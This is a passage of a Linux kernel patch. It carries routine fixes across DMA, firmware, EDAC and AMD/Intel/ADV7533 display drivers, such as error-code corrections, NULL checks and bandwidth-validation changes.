+ 	if (!child)
+-		return;
++		return 0;
+ 
+ 	dw_edma_v0_core_start(child, !desc->xfer_sz);
+ 	desc->xfer_sz += child->ll_region.sz;
+@@ -195,6 +195,8 @@ static void dw_edma_start_transfer(struct dw_edma_chan *chan)
+ 	list_del(&child->list);
+ 	kfree(child);
+ 	desc->chunks_alloc--;
++
++	return 1;
+ }
+ 
+ static int dw_edma_device_config(struct dma_chan *dchan,
+@@ -277,9 +279,12 @@ static void dw_edma_device_issue_pending(struct dma_chan *dchan)
+ 	struct dw_edma_chan *chan = dchan2dw_edma_chan(dchan);
+ 	unsigned long flags;
+ 
++	if (!chan->configured)
++		return;
++
+ 	spin_lock_irqsave(&chan->vc.lock, flags);
+-	if (chan->configured && chan->request == EDMA_REQ_NONE &&
+-	    chan->status == EDMA_ST_IDLE && vchan_issue_pending(&chan->vc)) {
++	if (vchan_issue_pending(&chan->vc) && chan->request == EDMA_REQ_NONE &&
++	    chan->status == EDMA_ST_IDLE) {
+ 		chan->status = EDMA_ST_BUSY;
+ 		dw_edma_start_transfer(chan);
+ 	}
+@@ -572,14 +577,14 @@ static void dw_edma_done_interrupt(struct dw_edma_chan *chan)
+ 		switch (chan->request) {
+ 		case EDMA_REQ_NONE:
+ 			desc = vd2dw_edma_desc(vd);
+-			if (desc->chunks_alloc) {
+-				chan->status = EDMA_ST_BUSY;
+-				dw_edma_start_transfer(chan);
+-			} else {
++			if (!desc->chunks_alloc) {
+ 				list_del(&vd->node);
+ 				vchan_cookie_complete(vd);
+-				chan->status = EDMA_ST_IDLE;
+ 			}
++
++			/* Continue transferring if there are remaining chunks or issued requests.
++			 */
++			chan->status = dw_edma_start_transfer(chan) ? EDMA_ST_BUSY : EDMA_ST_IDLE;
+ 			break;
+ 
+ 		case EDMA_REQ_STOP:
+diff --git a/drivers/dma/mv_xor_v2.c b/drivers/dma/mv_xor_v2.c
+index 113834e1167b6..d086ff1824f82 100644
+--- a/drivers/dma/mv_xor_v2.c
++++ b/drivers/dma/mv_xor_v2.c
+@@ -755,7 +755,7 @@ static int mv_xor_v2_probe(struct platform_device *pdev)
+ 
+ 	xor_dev->clk = devm_clk_get(&pdev->dev, NULL);
+ 	if (PTR_ERR(xor_dev->clk) == -EPROBE_DEFER) {
+-		ret = EPROBE_DEFER;
++		ret = -EPROBE_DEFER;
+ 		goto disable_reg_clk;
+ 	}
+ 	if (!IS_ERR(xor_dev->clk)) {
+diff --git a/drivers/dma/qcom/gpi.c b/drivers/dma/qcom/gpi.c
+index 98d45ee4b4e34..db6d0dc308d29 100644
+--- a/drivers/dma/qcom/gpi.c
++++ b/drivers/dma/qcom/gpi.c
+@@ -1966,7 +1966,6 @@ error_alloc_ev_ring:
+ error_config_int:
+ 	gpi_free_ring(&gpii->ev_ring, gpii);
+ exit_gpi_init:
+-	mutex_unlock(&gpii->ctrl_lock);
+ 	return ret;
+ }
+ 
+diff --git a/drivers/edac/skx_base.c b/drivers/edac/skx_base.c
+index 7e2762f62eec1..bc399469e9594 100644
+--- a/drivers/edac/skx_base.c
++++ b/drivers/edac/skx_base.c
+@@ -510,7 +510,7 @@ rir_found:
+ }
+ 
+ static u8 skx_close_row[] = {
+-	15, 16, 17, 18, 20, 21, 22, 28, 10, 11, 12, 13, 29, 30, 31, 32, 33
++	15, 16, 17, 18, 20, 21, 22, 28, 10, 11, 12, 13, 29, 30, 31, 32, 33, 34
+ };
+ 
+ static u8 skx_close_column[] = {
+@@ -518,7 +518,7 @@ static u8 skx_close_column[] = {
+ };
+ 
+ static u8 skx_open_row[] = {
+-	14, 15, 16, 20, 28, 21, 22, 23, 24, 25, 26, 27, 29, 30, 31, 32, 33
++	14, 15, 16, 20, 28, 21, 22, 23, 24, 25, 26, 27, 29, 30, 31, 32, 33, 34
+ };
+ 
+ static u8 skx_open_column[] = {
+diff --git a/drivers/firmware/arm_scmi/driver.c b/drivers/firmware/arm_scmi/driver.c
+index ffdad59ec81fc..fe06dc1936896 100644
+--- a/drivers/firmware/arm_scmi/driver.c
++++ b/drivers/firmware/arm_scmi/driver.c
+@@ -1981,7 +1981,7 @@ static int scmi_xfer_info_init(struct scmi_info *sinfo)
+ 		return ret;
+ 
+ 	ret = __scmi_xfer_info_init(sinfo, &sinfo->tx_minfo);
+-	if (!ret && idr_find(&sinfo->rx_idr, SCMI_PROTOCOL_BASE))
++	if (!ret && !idr_is_empty(&sinfo->rx_idr))
+ 		ret = __scmi_xfer_info_init(sinfo, &sinfo->rx_minfo);
+ 
+ 	return ret;
+diff --git a/drivers/firmware/qcom_scm.c b/drivers/firmware/qcom_scm.c
+index cdbfe54c81467..51eb85354c058 100644
+--- a/drivers/firmware/qcom_scm.c
++++ b/drivers/firmware/qcom_scm.c
+@@ -1418,8 +1418,7 @@ static int qcom_scm_probe(struct platform_device *pdev)
+ static void qcom_scm_shutdown(struct platform_device *pdev)
+ {
+ 	/* Clean shutdown, disable download mode to allow normal restart */
+-	if (download_mode)
+-		qcom_scm_set_download_mode(false);
++	qcom_scm_set_download_mode(false);
+ }
+ 
+ static const struct of_device_id qcom_scm_dt_match[] = {
+diff --git a/drivers/firmware/stratix10-svc.c b/drivers/firmware/stratix10-svc.c
+index bde1f543f5298..80f4e2d14e046 100644
+--- a/drivers/firmware/stratix10-svc.c
++++ b/drivers/firmware/stratix10-svc.c
+@@ -1133,8 +1133,8 @@ static int stratix10_svc_drv_probe(struct platform_device *pdev)
+ 		return ret;
+ 
+ 	genpool = svc_create_memory_pool(pdev, sh_memory);
+-	if (!genpool)
+-		return -ENOMEM;
++	if (IS_ERR(genpool))
++		return PTR_ERR(genpool);
+ 
+ 	/* allocate service controller and supporting channel */
+ 	controller = devm_kzalloc(dev, sizeof(*controller), GFP_KERNEL);
+diff --git a/drivers/fpga/fpga-bridge.c b/drivers/fpga/fpga-bridge.c
+index 13918c8c839ea..833ce13ff6f86 100644
+--- a/drivers/fpga/fpga-bridge.c
++++ b/drivers/fpga/fpga-bridge.c
+@@ -115,7 +115,7 @@ static int fpga_bridge_dev_match(struct device *dev, const void *data)
+ /**
+  * fpga_bridge_get - get an exclusive reference to an fpga bridge
+  * @dev:	parent device that fpga bridge was registered with
+- * @info:	fpga manager info
++ * @info:	fpga image specific information
+  *
+  * Given a device, get an exclusive reference to an fpga bridge.
+  *
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+index 9df5dcedaf3e2..9776e0b488cf6 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+@@ -35,6 +35,7 @@
+ #include <linux/devcoredump.h>
+ #include <generated/utsrelease.h>
+ #include <linux/pci-p2pdma.h>
++#include <linux/apple-gmux.h>
+ 
+ #include <drm/drm_aperture.h>
+ #include <drm/drm_atomic_helper.h>
+@@ -3942,12 +3943,15 @@ fence_driver_init:
+ 	if ((adev->pdev->class >> 8) == PCI_CLASS_DISPLAY_VGA)
+ 		vga_client_register(adev->pdev, amdgpu_device_vga_set_decode);
+ 
+-	if (amdgpu_device_supports_px(ddev)) {
+-		px = true;
++	px = amdgpu_device_supports_px(ddev);
++
++	if (px || (!pci_is_thunderbolt_attached(adev->pdev) &&
++				apple_gmux_detect(NULL, NULL)))
+ 		vga_switcheroo_register_client(adev->pdev,
+ 					       &amdgpu_switcheroo_ops, px);
++
++	if (px)
+ 		vga_switcheroo_init_domain_pm_ops(adev->dev, &adev->vga_pm_domain);
+-	}
+ 
+ 	if (adev->gmc.xgmi.pending_reset)
+ 		queue_delayed_work(system_wq, &mgpu_info.delayed_reset_work,
+@@ -4053,6 +4057,7 @@ void amdgpu_device_fini_hw(struct amdgpu_device *adev)
+ void amdgpu_device_fini_sw(struct amdgpu_device *adev)
+ {
+ 	int idx;
++	bool px;
+ 
+ 	amdgpu_fence_driver_sw_fini(adev);
+ 	amdgpu_device_ip_fini(adev);
+@@ -4072,10 +4077,16 @@ void amdgpu_device_fini_sw(struct amdgpu_device *adev)
+ 
+ 	kfree(adev->bios);
+ 	adev->bios = NULL;
+-	if (amdgpu_device_supports_px(adev_to_drm(adev))) {
++
++	px = amdgpu_device_supports_px(adev_to_drm(adev));
++
++	if (px || (!pci_is_thunderbolt_attached(adev->pdev) &&
++				apple_gmux_detect(NULL, NULL)))
+ 		vga_switcheroo_unregister_client(adev->pdev);
++
++	if (px)
+ 		vga_switcheroo_fini_domain_pm_ops(adev->dev);
+-	}
++
+ 	if ((adev->pdev->class >> 8) == PCI_CLASS_DISPLAY_VGA)
+ 		vga_client_unregister(adev->pdev);
+ 
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index 6c5ea99223bab..99b99f0b42c06 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -1763,7 +1763,8 @@ static void amdgpu_dm_fini(struct amdgpu_device *adev)
+ 		dc_deinit_callbacks(adev->dm.dc);
+ #endif
+ 
+-	dc_dmub_srv_destroy(&adev->dm.dc->ctx->dmub_srv);
++	if (adev->dm.dc)
++		dc_dmub_srv_destroy(&adev->dm.dc->ctx->dmub_srv);
+ 
+ 	if (dc_enable_dmub_notifications(adev->dm.dc)) {
+ 		kfree(adev->dm.dmub_notify);
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_psr.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_psr.c
+index 26291db0a3cf6..872d06fe14364 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_psr.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_psr.c
+@@ -122,6 +122,9 @@ bool amdgpu_dm_link_setup_psr(struct dc_stream_state *stream)
+ 		psr_config.allow_multi_disp_optimizations =
+ 			(amdgpu_dc_feature_mask & DC_PSR_ALLOW_MULTI_DISP_OPT);
+ 
++		if (!psr_su_set_y_granularity(dc, link, stream, &psr_config))
++			return false;
++
+ 		ret = dc_link_setup_psr(link, stream, &psr_config, &psr_context);
+ 
+ 	}
+diff --git a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn21/rn_clk_mgr_vbios_smu.h b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn21/rn_clk_mgr_vbios_smu.h
+index 3e5df27aa96fc..1ce19d875358f 100644
+--- a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn21/rn_clk_mgr_vbios_smu.h
++++ b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn21/rn_clk_mgr_vbios_smu.h
+@@ -26,6 +26,8 @@
+ #ifndef DAL_DC_RN_CLK_MGR_VBIOS_SMU_H_
+ #define DAL_DC_RN_CLK_MGR_VBIOS_SMU_H_
+ 
++enum dcn_pwr_state;
++
+ int rn_vbios_smu_get_smu_version(struct clk_mgr_internal *clk_mgr);
+ int rn_vbios_smu_set_dispclk(struct clk_mgr_internal *clk_mgr, int requested_dispclk_khz);
+ int rn_vbios_smu_set_dprefclk(struct clk_mgr_internal *clk_mgr);
+@@ -33,7 +35,7 @@ int rn_vbios_smu_set_hard_min_dcfclk(struct clk_mgr_internal *clk_mgr, int reque
+ int rn_vbios_smu_set_min_deep_sleep_dcfclk(struct clk_mgr_internal *clk_mgr, int requested_min_ds_dcfclk_khz);
+ void rn_vbios_smu_set_phyclk(struct clk_mgr_internal *clk_mgr, int requested_phyclk_khz);
+ int rn_vbios_smu_set_dppclk(struct clk_mgr_internal *clk_mgr, int requested_dpp_khz);
+-void rn_vbios_smu_set_dcn_low_power_state(struct clk_mgr_internal *clk_mgr, int display_count);
++void rn_vbios_smu_set_dcn_low_power_state(struct clk_mgr_internal *clk_mgr, enum dcn_pwr_state);
+ void rn_vbios_smu_enable_48mhz_tmdp_refclk_pwrdwn(struct clk_mgr_internal *clk_mgr, bool enable);
+ void rn_vbios_smu_enable_pme_wa(struct clk_mgr_internal *clk_mgr);
+ int rn_vbios_smu_is_periodic_retraining_disabled(struct clk_mgr_internal *clk_mgr);
+diff --git a/drivers/gpu/drm/amd/display/dc/dce60/Makefile b/drivers/gpu/drm/amd/display/dc/dce60/Makefile
+index dda596fa1cd76..fee331accc0e7 100644
+--- a/drivers/gpu/drm/amd/display/dc/dce60/Makefile
++++ b/drivers/gpu/drm/amd/display/dc/dce60/Makefile
+@@ -23,7 +23,7 @@
+ # Makefile for the 'controller' sub-component of DAL.
+ # It provides the control and status of HW CRTC block.
+ 
+-CFLAGS_AMDDALPATH)/dc/dce60/dce60_resource.o = $(call cc-disable-warning, override-init)
++CFLAGS_$(AMDDALPATH)/dc/dce60/dce60_resource.o = $(call cc-disable-warning, override-init)
+ 
+ DCE60 = dce60_timing_generator.o dce60_hw_sequencer.o \
+ 	dce60_resource.o
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_resource.c b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_resource.c
+index 020f512e9690e..e958f838c8041 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_resource.c
+@@ -1641,7 +1641,8 @@ noinline bool dcn30_internal_validate_bw(
+ 		display_e2e_pipe_params_st *pipes,
+ 		int *pipe_cnt_out,
+ 		int *vlevel_out,
+-		bool fast_validate)
++		bool fast_validate,
++		bool allow_self_refresh_only)
+ {
+ 	bool out = false;
+ 	bool repopulate_pipes = false;
+@@ -1668,7 +1669,7 @@ noinline bool dcn30_internal_validate_bw(
+ 
+ 	dml_log_pipe_params(&context->bw_ctx.dml, pipes, pipe_cnt);
+ 
+-	if (!fast_validate) {
++	if (!fast_validate || !allow_self_refresh_only) {
+ 		/*
+ 		 * DML favors voltage over p-state, but we're more interested in
+ 		 * supporting p-state over voltage. We can't support p-state in
+@@ -1681,11 +1682,12 @@ noinline bool dcn30_internal_validate_bw(
+ 		if (vlevel < context->bw_ctx.dml.soc.num_states)
+ 			vlevel = dcn20_validate_apply_pipe_split_flags(dc, context, vlevel, split, merge);
+ 	}
+-	if (fast_validate || vlevel == context->bw_ctx.dml.soc.num_states ||
+-			vba->DRAMClockChangeSupport[vlevel][vba->maxMpcComb] == dm_dram_clock_change_unsupported) {
++	if (allow_self_refresh_only &&
++	    (fast_validate || vlevel == context->bw_ctx.dml.soc.num_states ||
++			vba->DRAMClockChangeSupport[vlevel][vba->maxMpcComb] == dm_dram_clock_change_unsupported)) {
+ 		/*
+-		 * If mode is unsupported or there's still no p-state support then
+-		 * fall back to favoring voltage.
++		 * If mode is unsupported or there's still no p-state support
++		 * then fall back to favoring voltage.
+ 		 *
+ 		 * We don't actually support prefetch mode 2, so require that we
+ 		 * at least support prefetch mode 1.
+@@ -2056,7 +2058,7 @@ bool dcn30_validate_bandwidth(struct dc *dc,
+ 	BW_VAL_TRACE_COUNT();
+ 
+ 	DC_FP_START();
+-	out = dcn30_internal_validate_bw(dc, context, pipes, &pipe_cnt, &vlevel, fast_validate);
++	out = dcn30_internal_validate_bw(dc, context, pipes, &pipe_cnt, &vlevel, fast_validate, true);
+ 	DC_FP_END();
+ 
+ 	if (pipe_cnt == 0)
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_resource.h b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_resource.h
+index 7d063c7d6a4bf..8e6b8b7368fdb 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_resource.h
++++ b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_resource.h
+@@ -64,7 +64,8 @@ bool dcn30_internal_validate_bw(
+ 		display_e2e_pipe_params_st *pipes,
+ 		int *pipe_cnt_out,
+ 		int *vlevel_out,
+-		bool fast_validate);
++		bool fast_validate,
++		bool allow_self_refresh_only);
+ void dcn30_calculate_wm_and_dlg(
+ 		struct dc *dc, struct dc_state *context,
+ 		display_e2e_pipe_params_st *pipes,
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_resource.c b/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_resource.c
+index fddc21a5a04c4..d825f11b4feaa 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_resource.c
+@@ -1770,7 +1770,7 @@ bool dcn31_validate_bandwidth(struct dc *dc,
+ 	BW_VAL_TRACE_COUNT();
+ 
+ 	DC_FP_START();
+-	out = dcn30_internal_validate_bw(dc, context, pipes, &pipe_cnt, &vlevel, fast_validate);
++	out = dcn30_internal_validate_bw(dc, context, pipes, &pipe_cnt, &vlevel, fast_validate, true);
+ 	DC_FP_END();
+ 
+ 	// Disable fast_validate to set min dcfclk in alculate_wm_and_dlg
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c
+index 9918bccd6defb..ffaa4e5b3fca0 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c
+@@ -1689,6 +1689,81 @@ static void dcn314_get_panel_config_defaults(struct dc_panel_config *panel_confi
+ 	*panel_config = panel_config_defaults;
+ }
+ 
++static bool filter_modes_for_single_channel_workaround(struct dc *dc,
++		struct dc_state *context)
++{
++	// Filter 2K@240Hz+8K@24fps above combination timing if memory only has single dimm LPDDR
++	if (dc->clk_mgr->bw_params->vram_type == 34 && dc->clk_mgr->bw_params->num_channels < 2) {
++		int total_phy_pix_clk = 0;
++
++		for (int i = 0; i < context->stream_count; i++)
++			if (context->res_ctx.pipe_ctx[i].stream)
++				total_phy_pix_clk += context->res_ctx.pipe_ctx[i].stream->phy_pix_clk;
++
++		if (total_phy_pix_clk >= (1148928+826260)) //2K@240Hz+8K@24fps
++			return true;
++	}
++	return false;
++}
++
++bool dcn314_validate_bandwidth(struct dc *dc,
++		struct dc_state *context,
++		bool fast_validate)
++{
++	bool out = false;
++
++	BW_VAL_TRACE_SETUP();
++
++	int vlevel = 0;
++	int pipe_cnt = 0;
++	display_e2e_pipe_params_st *pipes = kzalloc(dc->res_pool->pipe_count * sizeof(display_e2e_pipe_params_st), GFP_KERNEL);
++	DC_LOGGER_INIT(dc->ctx->logger);
++
++	BW_VAL_TRACE_COUNT();
++
++	if (filter_modes_for_single_channel_workaround(dc, context))
++		goto validate_fail;
++
++	DC_FP_START();
++	// do not support self refresh only
++	out = dcn30_internal_validate_bw(dc, context, pipes, &pipe_cnt, &vlevel, fast_validate, false);
++	DC_FP_END();
++
++	// Disable fast_validate to set min dcfclk in calculate_wm_and_dlg
++	if (pipe_cnt == 0)
++		fast_validate = false;
++
++	if (!out)
++		goto validate_fail;
++
++	BW_VAL_TRACE_END_VOLTAGE_LEVEL();
++
++	if (fast_validate) {
++		BW_VAL_TRACE_SKIP(fast);
++		goto validate_out;
++	}
++
++	dc->res_pool->funcs->calculate_wm_and_dlg(dc, context, pipes, pipe_cnt, vlevel);
++
++	BW_VAL_TRACE_END_WATERMARKS();
++
++	goto validate_out;
++
++validate_fail:
++	DC_LOG_WARNING("Mode Validation Warning: %s failed validation.\n",
++		dml_get_status_message(context->bw_ctx.dml.vba.ValidationStatus[context->bw_ctx.dml.vba.soc.num_states]));
++
++	BW_VAL_TRACE_SKIP(fail);
++	out = false;
++
++validate_out:
++	kfree(pipes);
++
++	BW_VAL_TRACE_FINISH();
++
++	return out;
++}
++
+ static struct resource_funcs dcn314_res_pool_funcs = {
+ 	.destroy = dcn314_destroy_resource_pool,
+ 	.link_enc_create = dcn31_link_encoder_create,
+@@ -1696,7 +1771,7 @@ static struct resource_funcs dcn314_res_pool_funcs = {
+ 	.link_encs_assign = link_enc_cfg_link_encs_assign,
+ 	.link_enc_unassign = link_enc_cfg_link_enc_unassign,
+ 	.panel_cntl_create = dcn31_panel_cntl_create,
+-	.validate_bandwidth = dcn31_validate_bandwidth,
++	.validate_bandwidth = dcn314_validate_bandwidth,
+ 	.calculate_wm_and_dlg = dcn31_calculate_wm_and_dlg,
+ 	.update_soc_for_wm_a = dcn31_update_soc_for_wm_a,
+ 	.populate_dml_pipes = dcn314_populate_dml_pipes_from_context,
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.h b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.h
+index 0dd3153aa5c17..49ffe71018dfb 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.h
++++ b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.h
+@@ -39,6 +39,10 @@ struct dcn314_resource_pool {
+ 	struct resource_pool base;
+ };
+ 
++bool dcn314_validate_bandwidth(struct dc *dc,
++		struct dc_state *context,
++		bool fast_validate);
++
+ struct resource_pool *dcn314_create_resource_pool(
+ 		const struct dc_init_data *init_data,
+ 		struct dc *dc);
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn30/dcn30_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn30/dcn30_fpu.c
+index e1e92daba6686..990dbd736e2ce 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn30/dcn30_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn30/dcn30_fpu.c
+@@ -636,7 +636,7 @@ int dcn30_find_dummy_latency_index_for_fw_based_mclk_switch(struct dc *dc,
+ 	while (dummy_latency_index < max_latency_table_entries) {
+ 		context->bw_ctx.dml.soc.dram_clock_change_latency_us =
+ 				dc->clk_mgr->bw_params->dummy_pstate_table[dummy_latency_index].dummy_pstate_latency_us;
+-		dcn30_internal_validate_bw(dc, context, pipes, &pipe_cnt, &vlevel, false);
++		dcn30_internal_validate_bw(dc, context, pipes, &pipe_cnt, &vlevel, false, true);
+ 
+ 		if (context->bw_ctx.dml.soc.allow_dram_self_refresh_or_dram_clock_change_in_vblank ==
+ 			dm_allow_self_refresh_and_mclk_switch)
+diff --git a/drivers/gpu/drm/amd/display/modules/power/power_helpers.c b/drivers/gpu/drm/amd/display/modules/power/power_helpers.c
+index 235259d6c5a16..9edd39322c822 100644
+--- a/drivers/gpu/drm/amd/display/modules/power/power_helpers.c
++++ b/drivers/gpu/drm/amd/display/modules/power/power_helpers.c
+@@ -907,3 +907,38 @@ bool mod_power_only_edp(const struct dc_state *context, const struct dc_stream_s
+ {
+ 	return context && context->stream_count == 1 && dc_is_embedded_signal(stream->signal);
+ }
++
++bool psr_su_set_y_granularity(struct dc *dc, struct dc_link *link,
++			      struct dc_stream_state *stream,
++			      struct psr_config *config)
++{
++	uint16_t pic_height;
++	uint8_t slice_height;
++
++	if ((link->connector_signal & SIGNAL_TYPE_EDP) &&
++	    (!dc->caps.edp_dsc_support ||
++	    link->panel_config.dsc.disable_dsc_edp ||
++	    !link->dpcd_caps.dsc_caps.dsc_basic_caps.fields.dsc_support.DSC_SUPPORT ||
++	    !stream->timing.dsc_cfg.num_slices_v))
++		return true;
++
++	pic_height = stream->timing.v_addressable +
++		stream->timing.v_border_top + stream->timing.v_border_bottom;
++
++	if (stream->timing.dsc_cfg.num_slices_v == 0)
++		return false;
++
++	slice_height = pic_height / stream->timing.dsc_cfg.num_slices_v;
++
++	if (slice_height) {
++		if (config->su_y_granularity &&
++		    (slice_height % config->su_y_granularity)) {
++			ASSERT(0);
++			return false;
++		}
++
++		config->su_y_granularity = slice_height;
++	}
++
++	return true;
++}
+diff --git a/drivers/gpu/drm/amd/display/modules/power/power_helpers.h b/drivers/gpu/drm/amd/display/modules/power/power_helpers.h
+index 316452e9dbc91..bb16b37b83da7 100644
+--- a/drivers/gpu/drm/amd/display/modules/power/power_helpers.h
++++ b/drivers/gpu/drm/amd/display/modules/power/power_helpers.h
+@@ -59,4 +59,7 @@ void mod_power_calc_psr_configs(struct psr_config *psr_config,
+ 		const struct dc_stream_state *stream);
+ bool mod_power_only_edp(const struct dc_state *context,
+ 		const struct dc_stream_state *stream);
++bool psr_su_set_y_granularity(struct dc *dc, struct dc_link *link,
++			      struct dc_stream_state *stream,
++			      struct psr_config *config);
+ #endif /* MODULES_POWER_POWER_HELPERS_H_ */
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c b/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
+index ed36088ebcfde..6d03459de5612 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
+@@ -161,10 +161,15 @@ int smu_get_dpm_freq_range(struct smu_context *smu,
+ 
+ int smu_set_gfx_power_up_by_imu(struct smu_context *smu)
+ {
+-	if (!smu->ppt_funcs && !smu->ppt_funcs->set_gfx_power_up_by_imu)
+-		return -EOPNOTSUPP;
++	int ret = 0;
++	struct amdgpu_device *adev = smu->adev;
+ 
+-	return smu->ppt_funcs->set_gfx_power_up_by_imu(smu);
++	if (smu->ppt_funcs->set_gfx_power_up_by_imu) {
++		ret = smu->ppt_funcs->set_gfx_power_up_by_imu(smu);
++		if (ret)
++			dev_err(adev->dev, "Failed to enable gfx imu!\n");
++	}
++	return ret;
+ }
+ 
+ static u32 smu_get_mclk(void *handle, bool low)
+@@ -195,6 +200,19 @@ static u32 smu_get_sclk(void *handle, bool low)
+ 	return clk_freq * 100;
+ }
+ 
++static int smu_set_gfx_imu_enable(struct smu_context *smu)
++{
++	struct amdgpu_device *adev = smu->adev;
++
++	if (adev->firmware.load_type != AMDGPU_FW_LOAD_PSP)
++		return 0;
++
++	if (amdgpu_in_reset(smu->adev) || adev->in_s0ix)
++		return 0;
++
++	return smu_set_gfx_power_up_by_imu(smu);
++}
++
+ static int smu_dpm_set_vcn_enable(struct smu_context *smu,
+ 				  bool enable)
+ {
+@@ -1386,15 +1404,9 @@ static int smu_hw_init(void *handle)
+ 	}
+ 
+ 	if (smu->is_apu) {
+-		if ((smu->ppt_funcs->set_gfx_power_up_by_imu) &&
+-				likely(adev->firmware.load_type == AMDGPU_FW_LOAD_PSP)) {
+-			ret = smu->ppt_funcs->set_gfx_power_up_by_imu(smu);
+-			if (ret) {
+-				dev_err(adev->dev, "Failed to Enable gfx imu!\n");
+-				return ret;
+-			}
+-		}
+-
++		ret = smu_set_gfx_imu_enable(smu);
++		if (ret)
++			return ret;
+ 		smu_dpm_set_vcn_enable(smu, true);
+ 		smu_dpm_set_jpeg_enable(smu, true);
+ 		smu_set_gfx_cgpg(smu, true);
+@@ -1670,6 +1682,10 @@ static int smu_resume(void *handle)
+ 		return ret;
+ 	}
+ 
++	ret = smu_set_gfx_imu_enable(smu);
++	if (ret)
++		return ret;
++
+ 	smu_set_gfx_cgpg(smu, true);
+ 
+ 	smu->disable_uclk_switch = 0;
+diff --git a/drivers/gpu/drm/bridge/adv7511/adv7533.c b/drivers/gpu/drm/bridge/adv7511/adv7533.c
+index 258c79d4dab0a..b8eeaf4736e70 100644
+--- a/drivers/gpu/drm/bridge/adv7511/adv7533.c
++++ b/drivers/gpu/drm/bridge/adv7511/adv7533.c
+@@ -103,22 +103,19 @@ void adv7533_dsi_power_off(struct adv7511 *adv)
+ enum drm_mode_status adv7533_mode_valid(struct adv7511 *adv,
+ 					const struct drm_display_mode *mode)
+ {
+-	int lanes;
++	unsigned long max_lane_freq;
+ 	struct mipi_dsi_device *dsi = adv->dsi;
++	u8 bpp = mipi_dsi_pixel_format_to_bpp(dsi->format);
+ 
+-	if (mode->clock > 80000)
+-		lanes = 4;
+-	else
+-		lanes = 3;
+-
+-	/*
+-	 * TODO: add support for dynamic switching of lanes
+-	 * by using the bridge pre_enable() op . Till then filter
+-	 * out the modes which shall need different number of lanes
+-	 * than what was configured in the device tree.
+-	 */
+-	if (lanes != dsi->lanes)
+-		return MODE_BAD;
++	/* Check max clock for either 7533 or 7535 */
++	if (mode->clock > (adv->type == ADV7533 ? 80000 : 148500))
++		return MODE_CLOCK_HIGH;
++
++	/* Check max clock for each lane */
++	max_lane_freq = (adv->type == ADV7533 ? 800000 : 891000);
++
++	if (mode->clock * bpp > max_lane_freq * adv->num_dsi_lanes)
++		return MODE_CLOCK_HIGH;
+ 
+ 	return MODE_OK;
+ }
+diff --git a/drivers/gpu/drm/drm_probe_helper.c b/drivers/gpu/drm/drm_probe_helper.c
+index 69b0b2b9cc1c5..3b968ad187cf3 100644
+--- a/drivers/gpu/drm/drm_probe_helper.c
++++ b/drivers/gpu/drm/drm_probe_helper.c
+@@ -557,8 +557,9 @@ retry:
+ 		 */
+ 		dev->mode_config.delayed_event = true;
+ 		if (dev->mode_config.poll_enabled)
+-			schedule_delayed_work(&dev->mode_config.output_poll_work,
+-					      0);
++			mod_delayed_work(system_wq,
++					 &dev->mode_config.output_poll_work,
++					 0);
+ 	}
+ 
+ 	/* Re-enable polling in case the global poll config changed. */
+diff --git a/drivers/gpu/drm/i915/display/intel_display.c b/drivers/gpu/drm/i915/display/intel_display.c
+index 3f3982ae9974b..455d9ae6c41c9 100644
+--- a/drivers/gpu/drm/i915/display/intel_display.c
++++ b/drivers/gpu/drm/i915/display/intel_display.c
+@@ -1079,7 +1079,7 @@ intel_get_crtc_new_encoder(const struct intel_atomic_state *state,
+ 		num_encoders++;
+ 	}
+ 
+-	drm_WARN(encoder->base.dev, num_encoders != 1,
++	drm_WARN(state->base.dev, num_encoders != 1,
+ 		 "%d encoders for pipe %c\n",
+ 		 num_encoders, pipe_name(master_crtc->pipe));
+ 
